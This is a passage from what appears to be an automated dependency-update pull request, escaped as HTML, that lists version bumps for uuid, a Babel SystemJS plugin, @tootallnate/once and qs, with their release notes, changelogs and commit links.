href=\"https://github.com/uuidjs/uuid/commit/e2d7314\"\u003ee2d7314\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/338\"\u003e#338\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v3.3.2...v3.3.3\"\u003e3.3.3\u003c/a\u003e (2019-08-19)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eno longer run ci tests on node v4\u003c/li\u003e\n\u003cli\u003eupgrade dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/3df73a98f07c0a38a94bcaf1ecde0e384dc3b126\"\u003e\u003ccode\u003e3df73a9\u003c/code\u003e\u003c/a\u003e chore(release): 3.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/e2d731463b680c5b816d144f66feef902586410e\"\u003e\u003ccode\u003ee2d7314\u003c/code\u003e\u003c/a\u003e feat: rename repository to github:uuidjs/uuid (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/351\"\u003e#351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/e444323b6a2c3a70e5abbd0f60ea9dfbacab9188\"\u003e\u003ccode\u003ee444323\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/349\"\u003e#349\u003c/a\u003e from kelektiv/dependabot/npm_and_yarn/handlebars-4.5.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/ac7a3f407a073a06f1a2f745903f89c6911e55d9\"\u003e\u003ccode\u003eac7a3f4\u003c/code\u003e\u003c/a\u003e chore(deps): bump handlebars from 4.1.2 to 4.5.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0b141e1560bdba80afb03309c78106ca9f353e04\"\u003e\u003ccode\u003e0b141e1\u003c/code\u003e\u003c/a\u003e Bump eslint-utils from 1.4.0 to 1.4.2 (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/60eb84ac3be13f4cf37c8c62c86f1bc54e396ab1\"\u003e\u003ccode\u003e60eb84a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/335\"\u003e#335\u003c/a\u003e from ctavan/prepare-for-esm\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/d125e45f766ce4b2732e2c287cd01ade7e3507e2\"\u003e\u003ccode\u003ed125e45\u003c/code\u003e\u003c/a\u003e test: run eslint as part of the tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/acd26d6ae87bf18ce7b75a6f4d6ae5d194b4c7ca\"\u003e\u003ccode\u003eacd26d6\u003c/code\u003e\u003c/a\u003e test: remove unused randomFillSync variable\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/b22219f6969a9f0a313820c62b6a4e09acad24d5\"\u003e\u003ccode\u003eb22219f\u003c/code\u003e\u003c/a\u003e chore: define global msCrypto to satisfy eslint\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/uuidjs/uuid/commit/0c4638b953bab0668d83f69d681e910ef795b98d\"\u003e\u003ccode\u003e0c4638b\u003c/code\u003e\u003c/a\u003e style: convert tabs to spaces\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/uuidjs/uuid/compare/v3.3.2...v3.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/plugin-transform-modules-systemjs` from 7.25.9 to 7.29.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e@​babel/plugin-transform-modules-systemjs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.7 (2026-05-25)\u003c/h2\u003e\n\u003cp\u003eRe-release all packages with npm provenance attestations\u003c/p\u003e\n\u003ch2\u003ev7.29.6 (2026-05-25)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18014\"\u003e#18014\u003c/a\u003e Catchup source map position in preserveFormat (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/18001\"\u003e#18001\u003c/a\u003e [7.x packport]Improve input source map handling (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-generator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17998\"\u003e#17998\u003c/a\u003e Preserve original identifier names from input sourcemaps (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17992\"\u003e#17992\u003c/a\u003e) (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 3\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMateusz Burzyński (\u003ca href=\"https://github.com/Andarist\"\u003e\u003ccode\u003e@​Andarist\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/61647ae2397c82c3c71f077b5ab109106a5cac0f\"\u003e\u003ccode\u003e61647ae\u003c/code\u003e\u003c/a\u003e v7.28.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a177d551adba99773f4ff00ea9bf46550def6132\"\u003e\u003ccode\u003ea177d55\u003c/code\u003e\u003c/a\u003e [Babel 8] Use \u003ccode\u003et.traverseFast\u003c/code\u003e to replace some \u003ccode\u003epath.traverse\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17518\"\u003e#17518\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/eebd3a06021c13d335b5b0bd79734df3abbea678\"\u003e\u003ccode\u003eeebd3a0\u003c/code\u003e\u003c/a\u003e v7.27.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/317e332e650bc04907bc787ab79f930288a3e71e\"\u003e\u003ccode\u003e317e332\u003c/code\u003e\u003c/a\u003e Enforce node protocol import (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17207\"\u003e#17207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/fdc0fb59e119ee0b38bced63867a344a5b4bc2f3\"\u003e\u003ccode\u003efdc0fb5\u003c/code\u003e\u003c/a\u003e [Babel 8] Bump nodejs requirements to \u003ccode\u003e^20.19.0 || \u0026gt;= 22.12.0\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17204\"\u003e#17204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/plugin-transform-modules-systemjs\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@tootallnate/once` from 2.0.0 to 2.0.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TooTallNate/once/releases\"\u003e@​tootallnate/once's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.0.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea1e5e2d: Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/TooTallNate/once/blob/v2.0.1/CHANGELOG.md\"\u003e@​tootallnate/once's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.0.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea1e5e2d: Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/bcbb21d387e5fb2d0bf8ec2fd8d0ac97d4553241\"\u003e\u003ccode\u003ebcbb21d\u003c/code\u003e\u003c/a\u003e ci: fix OIDC publishing — Node 24, npm latest, provenance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/dc24387be8e3405f1e7c911caf76c87b72a0e145\"\u003e\u003ccode\u003edc24387\u003c/code\u003e\u003c/a\u003e Version Packages (2.x) (\u003ca href=\"https://redirect.github.com/TooTallNate/once/issues/12\"\u003e#12\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/b8a6f80afcfd2482b4bdb1e29d784340a05e0ce3\"\u003e\u003ccode\u003eb8a6f80\u003c/code\u003e\u003c/a\u003e CI: test all Node versions on Linux only\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/dabcc0fb6202663cd83994f0a21ea1c710395327\"\u003e\u003ccode\u003edabcc0f\u003c/code\u003e\u003c/a\u003e ci: drop EOL Node.js 14.x/16.x, add 22.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/b464efcf4238d92590245b4d211d2fc05a94d28a\"\u003e\u003ccode\u003eb464efc\u003c/code\u003e\u003c/a\u003e Update CI: modern Node versions, fix macOS ARM64 compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TooTallNate/once/commit/a1e5e2d784bcd1c65e49fac1524c6c94fe81f871\"\u003e\u003ccode\u003ea1e5e2d\u003c/code\u003e\u003c/a\u003e Fix promise hang when AbortSignal is aborted\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/TooTallNate/once/compare/2.0.0...v2.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​tootallnate/once\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.14.0 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictMerge\u003c/code\u003e option to wrap object/primitive conflicts in an array (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/425\"\u003e#425\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/ljharb/qs/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eduplicates\u003c/code\u003e option should not apply to bracket notation keys (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/514\"\u003e#514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression 